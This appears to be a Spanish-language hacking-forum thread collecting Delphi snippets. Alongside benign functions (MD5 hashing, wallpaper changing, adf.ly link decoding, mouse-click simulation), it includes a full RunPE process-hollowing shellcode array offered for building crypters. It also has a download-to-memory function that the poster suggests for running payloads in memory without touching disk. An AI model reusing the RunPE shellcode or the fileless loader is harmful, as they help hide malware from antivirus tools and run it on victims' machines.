Librería de Snippets para Delphi

Iniciado por crack81, 5 Julio 2015, 20:05 PM

0 Miembros y 2 Visitantes están viendo este tema.

BDWONG

Les dejo dos funciones para obtener tanto el md5 de los ficheros como de las cadenas, las funciones fuero probadas en Delphi 2010 creo que en Delphi 7 cambia un poco la forma de obtenerlo


Código (delphi) [Seleccionar]
uses
  SysUtils,IdHashMessageDigest, idHash,classes;

//funcin para obtener el md5 de ficheros como los .exe
function FileMD5(const fileName : string) : string;
var
   idmd5 : TIdHashMessageDigest5;
   fs : TFileStream;//Es una Clase para leer ficheros como los .exe
begin
   idmd5 := TIdHashMessageDigest5.Create; //creamos objeto para calcular md5
   fs := TFileStream.Create(fileName, fmOpenRead OR fmShareDenyWrite) ; //stream para leer el fichero
   try
     result := idmd5.HashStreamAsHex(fs); //obtenemos md5 del fichero
   finally
   //liberamos los objetos
     fs.Free;
     idmd5.Free;
   end
end;


//funcion para obtener el md5 de cualquier string
function StringMd5(const data : string) : string;
var
   idmd5 : TIdHashMessageDigest5;
begin
   idmd5 := TIdHashMessageDigest5.Create;//creamos el objeto
   try
     result := idmd5.HashStringAsHex(data);//retornamos el md5 del string
   finally
     idmd5.Free;//liberamos el objeto
   end
end;


var
ruta,strMd5,cadena:string;
begin
  ruta:='C:\project1.exe';  //ruta del fichero
  strMd5:=FileMD5(ruta); //obtenemos md5
  writeln('El md5 del fichero es ',strMd5);//lo mostramos


  {-------------------------------------------}

  cadena:='hola mundo';//cadena a calcular md5
  strMd5:=StringMd5(cadena);//obtenemos su md5
  writeln('El md5 del string  es ',strMd5);//lo mostramos

  readln;
end.


crack81

Funcion para cambiar el fondo al escritorio utilizando la api de windows

Código (delphi) [Seleccionar]
uses
  SysUtils,
  windows;

function cambiarFondo(const imagen:string):boolean;
begin
   Result:=SystemParametersInfo(20,0,@imagen[1],0);
end;

var
foto:string;
begin
writeln(cambiarFondo('image.bmp'));
writeln('Imagen cambiada');
readln;
end.



Otra alternativa para cambiar el fondo de un escritorio pero ahora utilizando  la interfaz IActiveDesktop

Código (delphi) [Seleccionar]
uses
  SysUtils,
  ComObj,ShlObj,ActiveX,windows;
 
function ChangeWallpaper(const Image: widestring): Boolean;
const
  CLSID_ActiveDesktop: TGUID = '{75048700-EF1F-11D0-9888-006097DEACF9}';
var
  ADesktop: IActiveDesktop;
begin
  CoInitialize(nil);
  ADesktop     := CreateComObject(CLSID_ActiveDesktop)as IActiveDesktop;
  try
    ADesktop.SetWallpaper(pwidechar(Image), 0);
    ADesktop.ApplyChanges(AD_APPLY_ALL or AD_APPLY_FORCE);
  finally
    CoUninitialize;
  end;
  Result:=True;
end;

begin
   ChangeWallpaper('C:\image.bmp');
   Writeln('Imagen cambiada');
   Readln;
end.


Si C/C++ es el padre de los lenguajes entonces ASM es dios.

crack81

Funcion para decodificar una url del servicio Adf.ly
uso: le pamos la url codificada y nos retorna la original, ojo para usar esta funcion se necesita conexion  a internet.


Código (delphi) [Seleccionar]
uses
  SysUtils,
  IdHTTP,
  IdCoderMIME;

function DecodeAdFly(const url:string):string;
var
http:TIdHTTP;
content,data,urlFinal,part1,part2:string;
pos1,pos2,i,npos:integer;
const
STRINGKEY='ysmm = ';
begin
  urlFinal:='';
  i:=1;
  http:=TIdHTTP.Create(nil);
  try
    content:=http.Get(url);//obtenemos el codigo html
    pos1:=pos(STRINGKEY,content);//encontramos el ysmm =
    pos2:=1;
    npos:=pos1;
    while(content[npos]<>';')do//recorremos el content hasta encontrar el ';'
    begin
      inc(npos);
      inc(pos2);//el pos2 nos dira cuantos caracteres tiene el ysmm
    end;
    //data alamcenrar la cadena de ysmm
    data:=copy(content,pos1+length(STRINGKEY)+1,pos2-length(STRINGKEY)-3);
    while(i<=length(data)) do //filtramos la cadena llamada data
    begin
      part1:=part1+data[i];
      part2:=data[i+1]+part2;
      i:=i+2;
    end;
    urlFinal:=TIdDecoderMIME.DecodeString(part1+part2);//los desciframos con base64
    Result:=copy(urlFinal,3,length(urlFinal)-2);//retornamos la url original
  finally
    http.Free; //liberamos el objeto creado arriba
  end;
end;

var
url:string;
begin
  url:=DecodeAdFly('http://adf.ly/dLgCS');
  writeln(url);
  readln;
end.
Si C/C++ es el padre de los lenguajes entonces ASM es dios.

crack81

Para lo  que les gusta el tema de los crypter les traigo un runpe en modo shellcode
y como usarlo

Código (delphi) [Seleccionar]
uses
  SysUtils,windows;

//shellcode del runPE  uso y parametros: runPE(path:pwidechar; bufferExe:pointer):cardinal;
Const
  Shell: Array [0 .. 1287] Of Byte = ($60, $E8, $4E, $00, $00, $00, $6B, $00, $65, $00, $72, $00, $6E, $00, $65, $00, $6C, $00, $33, $00, $32, $00, $00, $00, $6E, $00, $74, $00, $64, $00, $6C, $00,
    $6C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $5B, $8B, $FC, $6A, $42, $E8, $BB, $03, $00, $00, $8B, $54, $24, $28, $89, $11, $8B, $54, $24, $2C, $6A, $3E, $E8, $AA, $03, $00,
    $00, $89, $11, $6A, $4A, $E8, $A1, $03, $00, $00, $89, $39, $6A, $1E, $6A, $3C, $E8, $9D, $03, $00, $00, $6A, $22, $68, $F4, $00, $00, $00, $E8, $91, $03, $00, $00, $6A, $26, $6A, $24, $E8, $88,
    $03, $00, $00, $6A, $2A, $6A, $40, $E8, $7F, $03, $00, $00, $6A, $2E, $6A, $0C, $E8, $76, $03, $00, $00, $6A, $32, $68, $C8, $00, $00, $00, $E8, $6A, $03, $00, $00, $6A, $2A, $E8, $5C, $03, $00,
    $00, $8B, $09, $C7, $01, $44, $00, $00, $00, $6A, $12, $E8, $4D, $03, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $79, $03, $00, $00, $6A, $3E, $E8, $3B, $03, $00, $00, $8B, $D1, $6A, $1E, $E8,
    $32, $03, $00, $00, $6A, $40, $FF, $32, $FF, $31, $FF, $D0, $6A, $12, $E8, $23, $03, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $4F, $03, $00, $00, $6A, $1E, $E8, $11, $03, $00, $00, $8B, $09,
    $8B, $51, $3C, $6A, $3E, $E8, $05, $03, $00, $00, $8B, $39, $03, $FA, $6A, $22, $E8, $FA, $02, $00, $00, $8B, $09, $68, $F8, $00, $00, $00, $57, $51, $FF, $D0, $6A, $00, $E8, $E8, $02, $00, $00,
    $68, $88, $FE, $B3, $16, $51, $E8, $14, $03, $00, $00, $6A, $2E, $E8, $D6, $02, $00, $00, $8B, $39, $6A, $2A, $E8, $CD, $02, $00, $00, $8B, $11, $6A, $42, $E8, $C4, $02, $00, $00, $57, $52, $6A,
    $00, $6A, $00, $6A, $04, $6A, $00, $6A, $00, $6A, $00, $6A, $00, $FF, $31, $FF, $D0, $6A, $12, $E8, $A9, $02, $00, $00, $68, $D0, $37, $10, $F2, $51, $E8, $D5, $02, $00, $00, $6A, $22, $E8, $97,
    $02, $00, $00, $8B, $11, $6A, $2E, $E8, $8E, $02, $00, $00, $8B, $09, $FF, $72, $34, $FF, $31, $FF, $D0, $6A, $00, $E8, $7E, $02, $00, $00, $68, $9C, $95, $1A, $6E, $51, $E8, $AA, $02, $00, $00,
    $6A, $22, $E8, $6C, $02, $00, $00, $8B, $11, $8B, $39, $6A, $2E, $E8, $61, $02, $00, $00, $8B, $09, $6A, $40, $68, $00, $30, $00, $00, $FF, $72, $50, $FF, $77, $34, $FF, $31, $FF, $D0, $6A, $36,
    $E8, $47, $02, $00, $00, $8B, $D1, $6A, $22, $E8, $3E, $02, $00, $00, $8B, $39, $6A, $3E, $E8, $35, $02, $00, $00, $8B, $31, $6A, $22, $E8, $2C, $02, $00, $00, $8B, $01, $6A, $2E, $E8, $23, $02,
    $00, $00, $8B, $09, $52, $FF, $77, $54, $56, $FF, $70, $34, $FF, $31, $6A, $00, $E8, $10, $02, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $3C, $02, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $12,
    $E8, $F9, $01, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $25, $02, $00, $00, $6A, $22, $E8, $E7, $01, $00, $00, $8B, $11, $83, $C2, $06, $6A, $3A, $E8, $DB, $01, $00, $00, $6A, $02, $52, $51,
    $FF, $D0, $6A, $36, $E8, $CE, $01, $00, $00, $C7, $01, $00, $00, $00, $00, $B8, $28, $00, $00, $00, $6A, $36, $E8, $BC, $01, $00, $00, $F7, $21, $6A, $1E, $E8, $B3, $01, $00, $00, $8B, $11, $8B,
    $52, $3C, $81, $C2, $F8, $00, $00, $00, $03, $D0, $6A, $3E, $E8, $9F, $01, $00, $00, $03, $11, $6A, $26, $E8, $96, $01, $00, $00, $6A, $28, $52, $FF, $31, $6A, $12, $E8, $8A, $01, $00, $00, $68,
    $5B, $E8, $14, $CF, $51, $E8, $B6, $01, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $26, $E8, $73, $01, $00, $00, $8B, $39, $8B, $09, $8B, $71, $14, $6A, $3E, $E8, $65, $01, $00, $00, $03, $31, $6A,
    $26, $E8, $5C, $01, $00, $00, $8B, $09, $8B, $51, $0C, $6A, $22, $E8, $50, $01, $00, $00, $8B, $09, $03, $51, $34, $6A, $46, $E8, $44, $01, $00, $00, $8B, $C1, $6A, $2E, $E8, $3B, $01, $00, $00,
    $8B, $09, $50, $FF, $77, $10, $56, $52, $FF, $31, $6A, $00, $E8, $2A, $01, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $56, $01, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $36, $E8, $13, $01, $00,
    $00, $8B, $11, $83, $C2, $01, $89, $11, $6A, $3A, $E8, $05, $01, $00, $00, $8B, $09, $3B, $CA, $0F, $85, $33, $FF, $FF, $FF, $6A, $32, $E8, $F4, $00, $00, $00, $8B, $09, $C7, $01, $07, $00, $01,
    $00, $6A, $00, $E8, $E5, $00, $00, $00, $68, $D2, $C7, $A7, $68, $51, $E8, $11, $01, $00, $00, $6A, $32, $E8, $D3, $00, $00, $00, $8B, $11, $6A, $2E, $E8, $CA, $00, $00, $00, $8B, $09, $52, $FF,
    $71, $04, $FF, $D0, $6A, $22, $E8, $BB, $00, $00, $00, $8B, $39, $83, $C7, $34, $6A, $32, $E8, $AF, $00, $00, $00, $8B, $31, $8B, $B6, $A4, $00, $00, $00, $83, $C6, $08, $6A, $2E, $E8, $9D, $00,
    $00, $00, $8B, $11, $6A, $46, $E8, $94, $00, $00, $00, $51, $6A, $04, $57, $56, $FF, $32, $6A, $00, $E8, $86, $00, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $B2, $00, $00, $00, $83, $C4, $0C,
    $FF, $D0, $6A, $22, $E8, $6F, $00, $00, $00, $8B, $09, $8B, $51, $28, $03, $51, $34, $6A, $32, $E8, $60, $00, $00, $00, $8B, $09, $81, $C1, $B0, $00, $00, $00, $89, $11, $6A, $00, $E8, $4F, $00,
    $00, $00, $68, $D3, $C7, $A7, $E8, $51, $E8, $7B, $00, $00, $00, $6A, $32, $E8, $3D, $00, $00, $00, $8B, $D1, $6A, $2E, $E8, $34, $00, $00, $00, $8B, $09, $FF, $32, $FF, $71, $04, $FF, $D0, $6A,
    $00, $E8, $24, $00, $00, $00, $68, $88, $3F, $4A, $9E, $51, $E8, $50, $00, $00, $00, $6A, $2E, $E8, $12, $00, $00, $00, $8B, $09, $FF, $71, $04, $FF, $D0, $6A, $4A, $E8, $04, $00, $00, $00, $8B,
    $21, $61, $C3, $8B, $CB, $03, $4C, $24, $04, $C3, $6A, $00, $E8, $F2, $FF, $FF, $FF, $68, $54, $CA, $AF, $91, $51, $E8, $1E, $00, $00, $00, $6A, $40, $68, $00, $10, $00, $00, $FF, $74, $24, $18,
    $6A, $00, $FF, $D0, $FF, $74, $24, $14, $E8, $CF, $FF, $FF, $FF, $89, $01, $83, $C4, $10, $C3, $E8, $22, $00, $00, $00, $68, $A4, $4E, $0E, $EC, $50, $E8, $4B, $00, $00, $00, $83, $C4, $08, $FF,
    $74, $24, $04, $FF, $D0, $FF, $74, $24, $08, $50, $E8, $38, $00, $00, $00, $83, $C4, $08, $C3, $55, $52, $51, $53, $56, $57, $33, $C0, $64, $8B, $70, $30, $8B, $76, $0C, $8B, $76, $1C, $8B, $6E,
    $08, $8B, $7E, $20, $8B, $36, $38, $47, $18, $75, $F3, $80, $3F, $6B, $74, $07, $80, $3F, $4B, $74, $02, $EB, $E7, $8B, $C5, $5F, $5E, $5B, $59, $5A, $5D, $C3, $55, $52, $51, $53, $56, $57, $8B,
    $6C, $24, $1C, $85, $ED, $74, $43, $8B, $45, $3C, $8B, $54, $28, $78, $03, $D5, $8B, $4A, $18, $8B, $5A, $20, $03, $DD, $E3, $30, $49, $8B, $34, $8B, $03, $F5, $33, $FF, $33, $C0, $FC, $AC, $84,
    $C0, $74, $07, $C1, $CF, $0D, $03, $F8, $EB, $F4, $3B, $7C, $24, $20, $75, $E1, $8B, $5A, $24, $03, $DD, $66, $8B, $0C, $4B, $8B, $5A, $1C, $03, $DD, $8B, $04, $8B, $03, $C5, $5F, $5E, $5B, $59,
    $5A, $5D, $C3, $C3, $00, $00, $00, $00);


//Funcion para leer un archivo binario y guardarlo dentro de una cadena
Function mFileToStr(Ruta: string): string;
var
sFile: HFile;
uBytes: Cardinal;
begin
sFile:= _lopen(PChar(Ruta), OF_READ);
uBytes:= GetFileSize(sFile, nil);
SetLength(Result, uBytes);
_lread(sfile, @result[1], uBytes);
_lclose(sFile);
end;

var
buffer:string;
szFilePath:array[1..1024]of widechar;

begin
  buffer:=mFileToStr('C:\bcb6kg.EXE'); //Leemos el fichero que queremos usar
  GetModuleFileNameW(0,@szFilePath[1],1024); //GetModuleFileNameW equivalente al paramstr(0) pero unicode
  writeln(pwidechar(widestring(szFilePath))); //mostramos la direccion actual del proyecto principal

  //el problema de llamado consistia en que el path tenia que ser unicode y yo lo manejaba como si fuera ascii
  CallWindowProcW(@shell[0],hwnd(@szFilePath[1]),cardinal(@buffer[1]),0,0);//ejecutamos el shellcode
  readln;
end.
Si C/C++ es el padre de los lenguajes entonces ASM es dios.

crack81

Funcion downloadFileBuffer

Hola despues de lo comentado en el foro hermano indetectables.net sobre la funcion URLOpenBlockingStream he decicido hacer mi implementacion en Delphi
bueno esta funcion lo que hace es descargar un fichero pero en vez de escribirlo en disco lo guarda en un buffer en memoria.

Bueno el uso que le demos puede ser variado ya que si queremos podemos escribir el contenido de ese buffer o ejecutarlo en memoria sin que toque disco.
el ejemplo viene con un simple ejemplo, me imagino que el va usar este ejemplo ya sabe como ejecutar un fichero en memoria o crear un nuevo fichero a travez de el
si tienen dudas sobre algo me avisan.

Código (delphi) [Seleccionar]
uses
  SysUtils,ActiveX,URLMon;

type
TBuffer=Array of Byte;

Function downloadFileBuffer(const URL:String):TBuffer;
var
stream:IStream;
sizeFile,sizeSet,bytesWritten:Int64;
buffer:TBuffer;
begin
Result:=nil;
if URLOpenBlockingStream (nil,pchar(URL),stream,0,nil)=S_OK then
begin
     stream.Seek(0,STREAM_SEEK_END,sizeFile);
     SetLength(buffer,sizeFile);
     stream.Seek(0,STREAM_SEEK_SET,sizeSet);
     stream.Read(@buffer[0],sizeFile,@bytesWritten);
     Result:=buffer;
end;
end;

var
url:String;
buffer:TBuffer;
begin
  url:='http://i67.tinypic.com/2v8lv88.png';
  buffer:=downloadFileBuffer(url);

  if buffer<>nil then
     Writeln('Tamano del fichero leido ',Length(buffer))
  else
     Writeln('Hubo un error ');

  Readln;
end.


El codigo ha sido probado en delphi 7

Saludos....
Si C/C++ es el padre de los lenguajes entonces ASM es dios.

crack81

[simulateClick] Funcion que simula el dar un click con el raton usando la api de windows y la version de delphi 2010

Código (delphi) [Seleccionar]
uses
  SysUtils,windows;

//Simula el click del raton
//parametros
//integer x,y: coordeandas donde queremos hacer click
//Result: retornar cuantos eveentos fueron ejectuados en este caso 2
function simulateClick(const x,y:Integer):Integer;
var
point:TPoint;
input:array[0..1]of TInput;
begin
   GetCursorPos(point);   //gurdamos coordenadas actuales
   SetCursorPos(x,y);     //colocamos el puntero en la posicion seleccionada
   ZeroMemory(@input,sizeof(input)); //rellenamos de ceros el arreglo de TInput

   //configuramos el evento para oprimir con el boton izquierdo del raton
   input[0].Itype:=INPUT_MOUSE;
   input[0].mi.dx:=x;
   input[0].mi.dx:=y;
   input[0].mi.dwFlags:=MOUSEEVENTF_LEFTDOWN;

   //configuramos el evento para soltar el mouse con  el boton izquierdo del raton
   input[1].Itype:=INPUT_MOUSE;
   input[1].mi.dx:=x;
   input[1].mi.dx:=y;
   input[1].mi.dwFlags:=MOUSEEVENTF_LEFTUP;

   //Ejecutamos los dos eventos anteriores
   Result:=SendInput(2,tagInput(input[0]),sizeof(TInput));
   //Restauramos las coordenadas originales(simula que no se movio el raton)
   SetCursorPos(point.X,point.Y);
end;


//Imprime la posicion X y Y actual del cursor
//conveniente usarlo dentro de un while inifito para saber las coordenadas
//al momento de mover el raton
procedure printPosition;
var point:TPoint;
begin
   GetCursorPos(point);
   Writeln(point.X,' x ',point.Y);
end;
//Main del programa
begin
   simulateClick(20,882);
   Writeln('Click simulado');
end.
Si C/C++ es el padre de los lenguajes entonces ASM es dios.